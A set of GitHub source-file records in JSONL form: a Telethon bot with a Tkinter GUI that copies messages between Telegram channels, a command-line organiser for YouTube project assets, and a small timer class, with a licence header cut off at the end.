-1001190739025: [-1001409636268],\n -1001277274378_1: [-1001409636268], -1001223414088: [-1001454406502],\n -1001454800574: [-1001409636268]}\nfrom_to = {}\nreplaces = {'technicalpipsfx':'forexflow_admin'}\nanti_anti_bot = False\nreplace_username = \"\"\nsingle_client_mode = True\ndelete_messages = True\n\n\n\n\nasync def read_one_sqlite(sql, *args):\n data = await loop.run_in_executor(None, lambda: dbConnection.cursor().execute(sql, args).fetchone())\n return data\n\n\nasync def read_all_sqlite(sql, *args):\n data = await loop.run_in_executor(None, lambda: dbConnection.cursor().execute(sql, args).fetchall())\n return data\nclient_1.get_messages()\nasync def exec_sqlite(sql, *args):\n return await loop.run_in_executor(None, lambda: dbConnection.cursor().execute(sql, args))\n\n\nclass BotMessageBind:\n def __init__(self, in_db_id, from_chat_id, from_chat_msg_id, to_chat_id, to_chat_msg_id):\n self.in_db_id: int = in_db_id\n self.from_chat_id: int = from_chat_id\n self.from_chat_msg_id: int = from_chat_msg_id\n self.to_chat_id: int = to_chat_id\n self.to_chat_msg_id: int = to_chat_msg_id\n\n async def push_changes(self):\n await exec_sqlite(\n f\"UPDATE {scriptName}_messagebind SET `from_chat_id` = ?, `from_chat_msg_id` = ?, `to_chat_id` = ?, \"\n \"`to_chat_msg_id` = ? WHERE in_db_id = ?\",\n self.from_chat_id, self.from_chat_msg_id, self.to_chat_id, self.to_chat_msg_id, self.in_db_id)\n\n\nasync def get_message_bind(in_db_id: int):\n res = await read_one_sqlite(f\"SELECT * FROM {scriptName}_messagebind WHERE in_db_id = ?\", in_db_id)\n if res is None:\n return None\n else:\n return BotMessageBind(*res)\n\n\nasync def get_message_bind_msg_id(from_chat_id: int, from_chat_msg_id: int, to_chat_id: int) -> [int, None]:\n res = await read_one_sqlite(\n f\"SELECT to_chat_msg_id FROM {scriptName}_messagebind WHERE from_chat_id = ? and \"\n f\"from_chat_msg_id = ? and to_chat_id = ?\", from_chat_id, from_chat_msg_id, to_chat_id)\n if res is None:\n return None\n else:\n return res[0]\n\n\nasync def create_message_bind(from_chat_id: int, from_chat_msg_id: int, to_chat_id: int, to_chat_msg_id: int):\n await exec_sqlite(\n f\"INSERT INTO {scriptName}_messagebind (from_chat_id, from_chat_msg_id, to_chat_id, to_chat_msg_id) VALUES \"\n f\"(?, ?, ?, ?)\", from_chat_id, from_chat_msg_id, to_chat_id, to_chat_msg_id)\n\n\nclass ProcessedMessage:\n def __init__(self, text, media):\n self.text = text\n self.media = media\n\n\nasync def process_message(message: Message, to_chat: int):\n if ignore_entities and message.entities:\n for entity in message.entities:\n if isinstance(entity, tuple(ignore_entities)):\n return\n if single_client_mode:\n media = message.media if not isinstance(message.media,\n (types.MessageMediaWebPage, types.MessageMediaPoll)) else None\n else:\n f_name = await message.download_media()\n media = f_name\n text_to_send = message.text\n if text_to_send:\n for key, value in zip(replaces.keys(), replaces.values()):\n text_to_send = re.sub(key, value, text_to_send, flags=re.IGNORECASE)\n completed = False\n\n if anti_anti_bot:\n if message.text and len(message.text) < 30 and message.buttons:\n for button_list in message.buttons:\n if completed:\n break\n for button in button_list:\n button: MessageButton\n if isinstance(button.button, types.KeyboardButtonCallback):\n res: BotCallbackAnswer = await button.click()\n text_to_send = res.message\n completed = True\n break\n lower = text_to_send.lower()\n if any(x in lower for x in ['succes ratio']):\n return False\n if replace_username:\n all_usernames = re.findall(r'@\\w+', text_to_send)\n if all_usernames:\n for uname in all_usernames:\n text_to_send = text_to_send.replace(uname, replace_username)\n return ProcessedMessage(text_to_send, media)\n\n\n@client_1.on(events.MessageDeleted())\nasync def delete_message_handler(event: events.MessageDeleted.Event):\n if delete_messages:\n if event.chat_id not in from_to:\n return\n for to in from_to[event.chat_id]:\n for deleted_id in event.deleted_ids:\n bound = await get_message_bind_msg_id(event.chat_id, deleted_id, to)\n if bound:\n await client_1.delete_messages(to, [bound])\n\n\n@client_1.on(events.MessageEdited())\nasync def edit_message_handler(event: events.MessageEdited.Event):\n if event.chat_id not in from_to:\n return\n message: Message = event.message\n for to in from_to[event.chat_id]:\n processed = await process_message(message, to)\n if not processed:\n raise events.StopPropagation\n ent = await client_1.get_input_entity(to)\n bound = await get_message_bind_msg_id(message.chat_id, message.id, to)\n if bound:\n await client_1.edit_message(ent, bound, processed.text, file=processed.media)\n if processed.media and not single_client_mode:\n os.remove(processed.media)\n\n\n@client_1.on(events.Album())\nasync def album_handler(event: events.Album.Event):\n if event.chat_id not in from_to:\n raise events.StopPropagation\n text = None\n for to in from_to[event.chat_id]:\n files = []\n for i, message in enumerate(event.messages):\n processed = await process_message(message, to)\n if not processed:\n raise events.StopPropagation\n if i == 0:\n text = processed.text\n files.append(processed.media)\n message = event.messages[0]\n ent = await client_1.get_input_entity(to)\n reply_to = None\n if message.reply_to_msg_id:\n reply_to = await get_message_bind_msg_id(event.chat_id, message.reply_to_msg_id, to)\n if not reply_to:\n return\n sent = await client_1.send_file(ent, file=files, caption=text, reply_to=reply_to)\n await create_message_bind(event.chat_id, message.id, to, sent[0].id)\n if not single_client_mode:\n for file in files:\n os.remove(file)\n raise events.StopPropagation\n\n\n@client_1.on(events.NewMessage(outgoing=True, incoming=True))\nasync def message_handler(event: events.NewMessage.Event):\n message: Message = event.message\n if not event.is_private:\n print(message.chat_id, message.text.replace(\"\\n\", \"\\\\n\") if message.text else None)\n if event.chat_id not in from_to:\n return\n\n if message.grouped_id:\n raise events.StopPropagation\n for to in from_to[event.chat_id]:\n processed = await process_message(message, to)\n if not processed:\n raise events.StopPropagation\n ent = await client_1.get_input_entity(to)\n reply_to = None\n\n if message.reply_to_msg_id:\n reply_to = await get_message_bind_msg_id(event.chat_id, message.reply_to_msg_id, to)\n if not reply_to:\n return\n await client_1(UpdateStatusRequest(False))\n\n sent: Message = await client_1.send_message(ent, processed.text, file=processed.media, reply_to=reply_to)\n await client_1(UpdateStatusRequest(True))\n await create_message_bind(event.chat_id, message.id, to, sent.id)\n if processed.media and not single_client_mode:\n os.remove(processed.media)\n\n\n\nasync def app():\n print('Preparing database...')\n await exec_sqlite(\n f\"CREATE TABLE IF NOT EXISTS {scriptName}_messagebind (`in_db_id` INTEGER DEFAULT 0 PRIMARY KEY ,\"\n f\" `from_chat_id` INTEGER DEFAULT 0, `from_chat_msg_id` INTEGER DEFAULT 0, \"\n f\"`to_chat_id` INTEGER DEFAULT 0, `to_chat_msg_id` INTEGER DEFAULT 0)\")\n print('Starting client_1 (receiver)...')\n await client_1.start()\n client_1_me = await client_1.get_me()\n await client_1.get_dialogs()\n print(f\"Authorized client_1 as @{client_1_me.username} ({utils.get_display_name(client_1_me)})\")\n print('Started')\n\n\nasync def start_app():\n \n print('starting main app now')\n await asyncio.sleep(1)\n await app()\ndef loop_in_thread(loop):\n asyncio.set_event_loop(loop)\n loop.run_until_complete(start_app())\nloop= asyncio.get_event_loop()\n\nt = threading.Thread(target=loop_in_thread, args=(loop,))\n#t.start()\n#loop= asyncio.get_event_loop()\nwindow = tk.Tk()\nwindow.geometry(\"650x400\")\n\n# define data frame here and bind with data entry widgets\ndata_frame = tk.Frame(window,relief=tk.RAISED, borderwidth=1,background='lightgray',width=300,height=200)\ndata_frame.place(x=0,y=0,width=650,height=175)\n# label widgets\nl_id = tk.Label(data_frame,text='api_id ',anchor='w',width=10)\nl_hash = tk.Label(data_frame,text='api hash ',anchor='w',width=10)\n#l_hash = tk.Label(window,text='enter api_hash: ')\nl_from = tk.Label(data_frame,text='from channel id ',anchor='w',width=10)\nl_to = tk.Label(data_frame,text=\"to channel_id\")\n\n# entery widgets\ntxt_id = tk.Entry(data_frame,width=60)\ntxt_hash = tk.Entry(data_frame,width=60)\ntxt_from = tk.Entry(data_frame,width=60)\ntxt_to = tk.Entry(data_frame,width=60)\n# status widgets\nstatus_var = tk.StringVar()\nstatus_var.set('status: application is off, press start app to run application')\n\nstatus = 'bot is running \\n'\ndef update_id():\n global api_id\n api_id = txt_id.get()\n txt_id.delete(0,tk.END)\n\n global status\n status = status + 'api id: '+str(api_id)+'\\n'\ndef update_hash():\n global api_hash\n api_hash = txt_hash.get()\n txt_hash.delete(0,tk.END)\n global status\n status = status + 'api hash: '+str(api_hash)+'\\n'\ndef update_from_to():\n # we update from_to dictionery which will be used for messaging binding\n val = int(txt_from.get())\n txt_from.delete(0,tk.END)\n val1 = int(txt_to.get())\n txt_to.delete(0,tk.END)\n # bind from chanel with to channel for communication \n from_to[val]= [val1]\n '''\n # create from_to_status string\n from_to_status = ' '\n for i in from_to:\n from_to_status = from_to_status+'from channel '+str(i)+' >>>> to channel '+ str(from_to[i])+'\\n' \n \n # append to status string\n global status\n status = status + from_to_status\n '''\ndef print_bindings():\n from_to_status = ' '\n for i in from_to:\n from_to_status = from_to_status+'from channel '+str(i)+' >>>> to channel '+ str(from_to[i])+'\\n' \n \n # append to status string\n global status\n status = status + from_to_status\ndef start_app_1():\n global status_var\n print_bindings()\n status_var.set(status)\n t.start()\n\ndef submit_data():\n update_id()\n update_hash()\n update_from_to()\n\ndef stop_app():\n loop.stop()\n status_var.set(\"Bot stopped now\")\n\n \n#button widgets\nbtn_id = tk.Button(data_frame,text='submit',width=15,command= update_id)\nbtn_hash = tk.Button(data_frame,text='submit',width=15,command= update_hash)\nbtn_from_to = tk.Button(data_frame,text='bind channels',width=15,command= update_from_to)\nbtn_all = tk.Button(data_frame,text='submit all',background='gray',width=15,command=submit_data)\n\n\n\n\n# define control frame here\n\ncontrol_frame = tk.Frame(window,relief=tk.RAISED,borderwidth=1,background='lightgray')\ncontrol_frame.pack(fill=tk.X,side=tk.BOTTOM)\n\n\n#start_button = tk.Button(window, text='start main app', bg='yellow',command = start_app_1)\n#stop_button = tk.Button(window, text='stop main app', bg='red',command = loop.stop)\n\nstart_button = tk.Button(control_frame, text=\"START APP\",background='green',width=15,command = start_app_1)\n\nstop_button = tk.Button(control_frame, text=\"STOP APP\",background='red',command = loop.stop)\nstart_button.pack(side=tk.LEFT, padx=5, pady=5)\nstop_button.pack(side=tk.RIGHT)\n\nlabel_frame = tk.LabelFrame(window, text=\"Application status\",width=650,height=200)\nlabel_frame.place(x=0,y=175)\n\n\noutput_label = tk.Label(label_frame,textvariable=status_var)\n\ndef main_gui():\n # paint labels on screen\n l_id.grid(column=0,row=0)\n l_hash.grid(column=0,row=1)\n l_from.grid(column=0,row=2)\n l_to.grid(column=0,row=3)\n # paint text boxes on screen\n txt_id.grid(column=1,row=0)\n txt_hash.grid(column=1,row=1)\n txt_from.grid(column=1,row=2)\n txt_to.grid(column=1,row=3)\n # pain buttons on window\n btn_id.grid(column=2,row=0)\n btn_hash.grid(column=2,row=1)\n btn_from_to.grid(column=2,row=3)\n btn_all.place(x=500,y=148)\n output_label.place(x=0,y=0)\n\n #start_button.grid(column=0,row=10)\n #stop_button.grid(column=0,row=11)\n\n #status_label.grid(column=0,row=12)\n window.mainloop()\n #stop_button.grid(window,row=11,column=0)\n #await asyncio.gather(client_1.run_until_disconnected(),main_gui())\n\n\nmain_gui()\n","repo_name":"bilalahhmedd/telegram-api-bot","sub_path":"flotime/final_copier.py","file_name":"final_copier.py","file_ext":"py","file_size_in_byte":14354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"71170903935","text":"import os\r\nimport shutil\r\nimport db\r\nimport tkinter as tk\r\nfrom tkinter import filedialog as fd\r\nfrom time import sleep\r\n\r\nwin = tk.Tk()\r\nwin.withdraw()\r\n\r\ncwd = os.path.join(os.getcwd(), 'Folders')\r\nfolders = {'Active': os.path.join(cwd, 'Active'),\r\n 'Store': os.path.join(os.getcwd(), 'Folders', 'Store'),\r\n 'Video': ['Video'],\r\n 'Assets': ['Assets'],\r\n 'Music': ['Assets', 'Music'],\r\n 'SFX': ['Assets', 'SFX'],\r\n 'Sprites': ['Assets', 'Sprites'],\r\n 'VFX': ['Assets', 'VFX'],\r\n 'Free': ['Free']}\r\ntrash_folder = os.path.join(folders['Store'], 'Trash')\r\nif not os.path.exists(trash_folder):\r\n os.makedirs(trash_folder)\r\nasset_type = {'sf': 'SFX', 'mu': 'Music', 'sp': 'Sprites', 'vf': 'VFX', 'vi': 'Video', 'f': 'Free'}\r\n\r\n\"\"\" COMMANDS\r\n crp - creates new project\r\n dlp - deletes a project\r\n dla - deletes asset from project\r\n dlu - deletes user\r\n crap- creates asset\r\n clap- loads asset\r\n ga - gets attribution\r\n rma - removes asset\r\n lp - loads project\r\n atd - adds asset to database\r\n dtp - gets asset from database into project\r\n \"\"\"\r\n\r\n\r\ndef copyfile(source, destination):\r\n try:\r\n shutil.copy(source, destination)\r\n print(\"File moved\")\r\n except shutil.SameFileError:\r\n print(\"Source and destination are the same\")\r\n except PermissionError as e:\r\n print(\"Needs permission: \", e)\r\n except Exception as e:\r\n print(\"Error: \", e)\r\n\r\n\r\ndef resetActiveFolder():\r\n if not os.path.exists(folders['Active']):\r\n os.makedirs(folders['Active'])\r\n else:\r\n shutil.rmtree(folders['Active'], ignore_errors=True)\r\n os.makedirs(folders['Active'])\r\n\r\n for folder in folders:\r\n\r\n if folder in ('Active', 'Store', 'Free'):\r\n continue\r\n\r\n path = os.path.join(cwd, 'Active')\r\n for f in folders[folder]:\r\n path = os.path.join(path, f)\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n fp = open(os.path.join(folders['Active'], 'Script.txt'), 'w')\r\n fp.close()\r\n\r\n\r\ndef deleteDirectory(path):\r\n if os.path.exists(path):\r\n shutil.rmtree(path, ignore_errors=True)\r\n print(f\"Successfully Deleted {path}\")\r\n if os.path.exists(path):\r\n print(f\"Could not delete {path}\")\r\n else:\r\n print(f\"Successfully Deleted {path}\")\r\n else:\r\n print(\"Path does not exit\")\r\n\r\n\r\ndef deleteFile(path):\r\n if os.path.exists(path):\r\n shutil.move(path, trash_folder)\r\n shutil.rmtree(trash_folder, ignore_errors=True)\r\n os.makedirs(trash_folder)\r\n if os.path.exists(path):\r\n print(f\"Could not delete {path}\")\r\n else:\r\n print(f\"Successfully Deleted {path}\")\r\n else:\r\n print(\"Path does not exit\")\r\n\r\n\r\ndef restart(old):\r\n del old\r\n proj = ProjectOrganiser()\r\n proj.db.cursor.close()\r\n\r\n\r\nclass Project:\r\n def __init__(self, id, name, desc=''):\r\n self.id = id\r\n self.name = name\r\n self.desc = desc\r\n self.assets = {}\r\n self.path = os.path.join(folders['Store'], 'Projects', id)\r\n self.createFiles()\r\n\r\n def createFiles(self):\r\n if not os.path.exists(self.path):\r\n os.makedirs(self.path)\r\n os.makedirs(os.path.join(self.path, \"Assets\"))\r\n os.makedirs(os.path.join(self.path, \"Video\"))\r\n\r\n for folder in folders:\r\n\r\n if folder in ['Active', 'Store']:\r\n continue\r\n\r\n path = self.path\r\n for f in folders[folder]:\r\n path = os.path.join(path, f)\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n def getAssetID(self):\r\n ids = []\r\n for asset in self.assets:\r\n asst = self.assets[asset]\r\n ids.append((asst.id, asst.gp))\r\n return ids\r\n\r\n\r\nclass Asset:\r\n def __init__(self, id, master, name, type, description, attribution=None, gp='p'):\r\n self.id = id\r\n self.name = name\r\n self.master = master\r\n self.file_ext = self.name.split('.')[-1]\r\n self.type = type\r\n self.desc = description\r\n self.attr = attribution\r\n self.gp = gp\r\n self.path = self.setPath()\r\n\r\n def setPath(self):\r\n path = ''\r\n if self.gp == 'g':\r\n path = os.path.join(folders['Store'], 'Assets', self.type, f'{self.id}.{self.file_ext}')\r\n elif self.gp == 'p':\r\n path = os.path.join(folders['Store'], 'Projects', self.master.id)\r\n for f in folders[self.type]:\r\n path = os.path.join(path, f)\r\n path = os.path.join(path, f\"{self.id}.{self.file_ext}\")\r\n return path\r\n\r\n\r\nclass ProjectOrganiser:\r\n def __init__(self):\r\n self.projects = {}\r\n self.activeProject = None\r\n self.assets = {}\r\n self.all_assets = {}\r\n\r\n self.db = db.DataBase()\r\n if not self.db.connected:\r\n print(\"\\n\\nDatabase connection failed\\n\\n\")\r\n return\r\n self.user = self.login()\r\n\r\n self.loadProjects()\r\n self.loop()\r\n\r\n def login(self):\r\n while 1:\r\n username = input(\"\\nWhat is your username? >\")\r\n user = self.db.checkUser(username)\r\n\r\n if self.db.checkUser(username) is not None:\r\n print(f\"\\nWelcome {user[0]}\\n\")\r\n return user\r\n else:\r\n yn = input(\"\\nWould you like to create an account? (y/n) \\n>\")\r\n if yn == 'y':\r\n user = self.db.createUser(username)\r\n print(f\"\\nWelcome {user[0]}\\n\")\r\n return user\r\n else:\r\n continue\r\n\r\n def deleteUser(self):\r\n y_n = input(f'ARE YOU SURE YOU WANT TO DELETE {self.user[0]}?!?! \\nIT IS IRREVERSIBLE(y/n)> ')\r\n if y_n != 'y':\r\n return\r\n\r\n prjs = dict(self.projects)\r\n success = self.db.deleteUser(self.user[1])\r\n if not success:\r\n return\r\n\r\n for project in prjs:\r\n self.deleteProject(prjs[project].name)\r\n restart(self)\r\n\r\n def loadProjects(self):\r\n resetActiveFolder()\r\n projects = self.db.loadProjects(self.user[1])\r\n\r\n if projects is None:\r\n return\r\n\r\n if len(projects) < 1:\r\n print(\"\\nNo projects available, creating one now\\n\")\r\n self.createProject(input(\"Give it a name > \"))\r\n\r\n for project in projects:\r\n\r\n prj = Project(project[0], project[1], project[2])\r\n self.projects[prj.name] = prj\r\n\r\n self.activeProject = prj\r\n\r\n self.loadAssets()\r\n print(f\"\\nProjects loaded successfully \\nAvailable Projects: {[x for x in self.projects]} \\n\"\r\n f\"Active Project: {self.activeProject.name}\")\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def loadProject(self, name):\r\n if name not in self.projects:\r\n print(f\"\\nProject [{name}] is not in the database\")\r\n return\r\n\r\n self.activeProject = self.projects[name]\r\n\r\n resetActiveFolder()\r\n self.loadAssets()\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def createProject(self, name):\r\n resetActiveFolder()\r\n desc = input('\\nWanna add a description?> ')\r\n id = self.db.createProject(name, self.user[1], desc)\r\n\r\n if id is None:\r\n return\r\n\r\n self.projects[name] = Project(id, name)\r\n self.activeProject = self.projects[name]\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def deleteProject(self, name):\r\n if name not in self.projects:\r\n print(f\"\\nProject [{name}] is not in the database\")\r\n return\r\n\r\n proj = self.projects[name]\r\n success = self.db.deleteProject(proj.id, proj.getAssetID())\r\n if not success:\r\n return\r\n self.projects.pop(name)\r\n deleteFile(proj.path)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def loadAssets(self):\r\n if len(self.projects) < 1:\r\n return\r\n\r\n all_assets = self.db.getAssets(self.activeProject.id)\r\n if all_assets is None:\r\n return\r\n\r\n personal, general, all_general = all_assets[0], all_assets[1], all_assets[2]\r\n\r\n for asset in general:\r\n asst = Asset(asset[0], self.activeProject, asset[1], asset[2], asset[3], asset[4], 'g')\r\n name = asset[1]\r\n if asset[1] not in self.activeProject.assets:\r\n self.activeProject.assets[asset[1]] = asst\r\n else:\r\n i = 0\r\n while 1:\r\n name = asset[1].split('.')\r\n name = f\"{name[0]}[{i}].{name[1]}\"\r\n if name not in self.activeProject.assets:\r\n self.activeProject.assets[name] = asst\r\n break\r\n else:\r\n i += 1\r\n file_ext = asset[1].split('.')[-1]\r\n\r\n source = os.path.join(folders['Store'], 'Assets', asset[2], f\"{asset[0]}.{file_ext}\")\r\n\r\n dest = os.path.join(folders['Active'])\r\n for f in folders[asset[2]]:\r\n if asset[2] == 'Free':\r\n continue\r\n elif asset[2] == 'Video':\r\n dest = os.path.join(dest, 'Video')\r\n else:\r\n dest = os.path.join(dest, f)\r\n dest = os.path.join(dest, name)\r\n copyfile(source, dest)\r\n\r\n for asset in personal:\r\n asst = Asset(asset[0], self.activeProject, asset[1], asset[2], asset[3], gp='p')\r\n name = asset[1]\r\n if asset[1] not in self.activeProject.assets:\r\n self.activeProject.assets[asset[1]] = asst\r\n else:\r\n i = 0\r\n while 1:\r\n name = asset[1].split('.')\r\n name = f\"{name[0]}[{i}].{name[1]}\"\r\n if name not in self.activeProject.assets:\r\n self.activeProject.assets[name] = asst\r\n break\r\n else:\r\n i += 1\r\n\r\n file_ext = asset[1].split('.')[-1]\r\n\r\n source = os.path.join(folders['Store'], 'Projects', self.activeProject.id)\r\n for f in folders[asset[2]]:\r\n source = os.path.join(source, f)\r\n source = os.path.join(source, f\"{asset[0]}.{file_ext}\")\r\n\r\n dest = os.path.join(folders['Active'])\r\n for f in folders[asset[2]]:\r\n if asset[2] == 'Free':\r\n continue\r\n else:\r\n dest = os.path.join(dest, f)\r\n dest = os.path.join(dest, name)\r\n copyfile(source, dest)\r\n\r\n for asset in all_general:\r\n asst = Asset(asset[0], self.activeProject, asset[1], asset[2], asset[3], asset[4], 'g')\r\n self.all_assets[asset[1]] = asst\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def addAsset(self):\r\n\r\n # Makes sure that there is a project available to avoid errors\r\n if len(self.projects) < 1:\r\n print(\"There is no project to import to\")\r\n return\r\n\r\n # Gets the path of the file relative to the active folder\r\n path = input('\\nPath to file >')\r\n active = folders['Active']\r\n path = path.split(',')\r\n\r\n for item in path:\r\n active = os.path.join(active, item)\r\n\r\n if not os.path.exists(active):\r\n print(\"\\nFile Does not exist\")\r\n return\r\n\r\n # Gets the type of file for database loading and saving\r\n type = self.getAssetType()\r\n\r\n while 1:\r\n gp = input(\"General or Personal (g,p) >\")\r\n if gp in ('g', 'p'): break\r\n\r\n desc = input(\"\\nDescription >\")\r\n\r\n if gp == 'g':\r\n attr = input(\"\\nAttribution >\")\r\n else:\r\n attr = \"\"\r\n\r\n print(f'''\\nPlease double check information \\n\r\n Name: {path[-1]} \\n\r\n Type: {type} {gp}\\n\r\n Description:{desc}\\n\r\n Attribution:{attr}\\n''')\r\n\r\n if input(\"(y/n)\") != 'y':\r\n return\r\n\r\n id = self.db.addAsset(self.activeProject.id, path[-1], type, desc, attr, gp)\r\n\r\n if id is None:\r\n print('Could not add asset')\r\n return\r\n\r\n asst = Asset(id, self.activeProject, path[-1], type, desc, attr, gp)\r\n if path[-1] not in self.activeProject.assets:\r\n self.activeProject.assets[path[-1]] = asst\r\n else:\r\n i = 0\r\n while 1:\r\n name = path[-1].split('.')\r\n name = f\"{name[0]}[{i}].{name[1]}\"\r\n if name not in self.activeProject.assets:\r\n self.activeProject.assets[name] = asst\r\n break\r\n else:\r\n i += 1\r\n\r\n file_ext = path[-1].split('.')[-1]\r\n dest = ''\r\n if gp == 'p':\r\n dest = os.path.join(folders['Store'],'Projects',self.activeProject.id)\r\n for f in folders[type]:\r\n dest = os.path.join(dest, f)\r\n dest = os.path.join(dest, f\"{id}.{file_ext}\")\r\n elif gp == 'g':\r\n dest = os.path.join(folders['Store'], 'Assets', type, f'{id}.{file_ext}')\r\n\r\n print(active)\r\n copyfile(active, dest)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def assetToDatabase(self):\r\n print(\"\\nOpening dialogue\")\r\n\r\n path = fd.askopenfilename()\r\n if not os.path.exists(path):\r\n return\r\n\r\n path = os.path.normpath(path)\r\n filename = os.path.basename(path)\r\n file_ext = filename.split('.')[-1]\r\n\r\n name = input(\"\\nWant to change the name? >\")\r\n if name == '':\r\n name = filename\r\n else:\r\n name = f\"{name}.{file_ext}\"\r\n type = self.getAssetType()\r\n desc = input(\"\\nDescription:\\n\")\r\n attr = input(\"Attribution:\\n\")\r\n\r\n print(f'''\\nPlease Confirm information\r\n Name: {name}\\n\r\n Type: {type}\\n\r\n Desc: {desc}\\n\r\n Attr: {attr}\\n''')\r\n y_n = input(\"(y/n)\")\r\n if y_n != 'y':\r\n return\r\n\r\n id = self.db.importToDatabase(name, type, desc, attr)\r\n if id is None:\r\n return\r\n asst = Asset(id, self, name, type, desc, attr, 'g')\r\n savepath = asst.path\r\n del asst\r\n\r\n copyfile(path, savepath)\r\n print(\"Successfully added to database\")\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def databaseToProject(self):\r\n assets = self.db.get_general_assets()\r\n print(\"Available General Assets >\", [x for x in assets])\r\n name = input(\"> \")\r\n if name not in assets:\r\n print(f\"{name} not in general assets\")\r\n return\r\n\r\n print(assets[name])\r\n asset_id = assets[name][1]\r\n type = assets[name][2]\r\n desc = assets[name][3]\r\n attr = assets[name][4]\r\n asst = Asset(asset_id, self, name, type, desc, attr, 'g')\r\n path = asst.path\r\n self.activeProject.assets[name] = asst\r\n\r\n success = self.db.importFromDatabase(asset_id, self.activeProject.id)\r\n if success is None:\r\n return\r\n\r\n dest = os.path.join(folders['Active'])\r\n for thing in folders[type]:\r\n dest = os.path.join(dest, thing)\r\n dest = os.path.join(dest, name)\r\n\r\n copyfile(path, dest)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def getAttribution(self):\r\n if len(self.projects) < 1:\r\n print(\"\\n There are no projects available\")\r\n return\r\n\r\n attr_path = os.path.join(folders['Active'], 'Attributions.txt')\r\n\r\n with open(attr_path, 'w', encoding='utf-8') as f:\r\n for asset in self.activeProject.assets:\r\n asst = self.activeProject.assets[asset]\r\n if asst.attr != 'None':\r\n f.write(f'\\n{asst.name} \\n')\r\n f.write(f'{asst.attr}\\n\\n')\r\n\r\n def deleteAsset(self, name):\r\n if name not in self.activeProject.assets:\r\n print(f\"\\n{name} not in Assets \\n\")\r\n return\r\n\r\n asst = self.activeProject.assets[name]\r\n success = self.db.deleteAsset(asst.id, asst.gp)\r\n if not success:\r\n return\r\n self.activeProject.assets.pop(name)\r\n deleteFile(asst.path)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def removeAsset(self, name):\r\n if name not in self.activeProject.assets:\r\n print(f\"\\n{name} not in Assets\\n\")\r\n return\r\n\r\n asst = self.activeProject.assets[name]\r\n\r\n success = self.db.removeAsset(asst.id, self.activeProject.id)\r\n if not success:\r\n return\r\n self.activeProject.assets.pop(name)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def getAssetType(self):\r\n while 1:\r\n type = input('\\nFile type (mu,sf, sp, vf,vi, f)>')\r\n if type in asset_type:\r\n return asset_type[type]\r\n\r\n def loop(self):\r\n while 1:\r\n command = input(\"\\nCmd> \")\r\n\r\n if command == 'exit':\r\n break\r\n elif command == 'crp':\r\n prj = input(\"\\nProject Name > \")\r\n self.createProject(prj)\r\n elif command == 'dlp':\r\n print([x for x in self.projects])\r\n name = input(\"Project Name > \")\r\n self.deleteProject(name)\r\n elif command == 'dla':\r\n print(self.activeProject.assets)\r\n name = input(\"Name > \")\r\n self.deleteAsset(name)\r\n elif command == 'dlu':\r\n y_n = input(f\"\\n Are you sure you want to delete User: {self.user[0]}?? (y/n)\")\r\n if y_n == 'y':\r\n self.deleteUser()\r\n elif command == 'crap':\r\n self.addAsset()\r\n elif command == 'clap':\r\n self.loadAssets()\r\n elif command == 'ga':\r\n self.getAttribution()\r\n elif command == 'rma':\r\n print(f'Available assets: ', [self.activeProject.assets[x].name for x in self.activeProject.assets if self.activeProject.assets[x].gp == 'g'])\r\n name = input(\"Asset name > \")\r\n self.removeAsset(name)\r\n elif command == 'lp':\r\n print(self.projects)\r\n prj = input(\"Project Name: > \")\r\n self.loadProject(prj)\r\n elif command == 'atd':\r\n self.assetToDatabase()\r\n elif command == 'dtp':\r\n self.databaseToProject()\r\n\r\n\r\nif __name__ == '__main__':\r\n prog = ProjectOrganiser()\r\n","repo_name":"IkeAnanaba/YoutubeFileOrganiser-V1.0","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13141286904","text":"import logging\nLOGGER = logging.getLogger(__name__)\n\nimport time\n\nfrom .config import *\n\nclass Timer():\n\n def __init__(self, engine):\n\n self.engine = engine\n self.start_time = self.engine.current_time\n\n def reset(self):\n\n self.start_time = self.engine.current_time\n\n def wait(self, duration, mode):\n\n if mode[0] == 'b':\n duration = duration * 60. / self.engine.tempo\n duration *= 1000000000 # s to ns\n elif mode[0] == 's':\n duration *= 1000000000 # s to ns\n elif mode == 'ns':\n pass\n else:\n LOGGER.error('unrecognized mode \"%s\" for wait()' % mode)\n return\n\n\n while self.engine.current_time - self.start_time < duration:\n time.sleep(MAINLOOP_PERIOD)\n\n self.start_time += duration\n\n def wait_next_cycle(self):\n\n cycle_duration = 1000000000 * self.engine.cycle_length * 60 / self.engine.tempo\n elapsed_time = (self.engine.current_time - self.engine.cycle_start_time)\n time_before_next_cycle = cycle_duration - elapsed_time % cycle_duration\n\n self.wait(time_before_next_cycle, 'ns')\n","repo_name":"Houston4444/mentat","sub_path":"mentat/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"30245635862","text":"\"\"\"\r\nMIT License\r\nCopyright (c) 2020 GamingGeek\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software\r\nand associated documentation files (the \"Software\"), to deal in the Software without restriction, \r\nincluding without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, \r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, \r\nsubject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF \r\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR 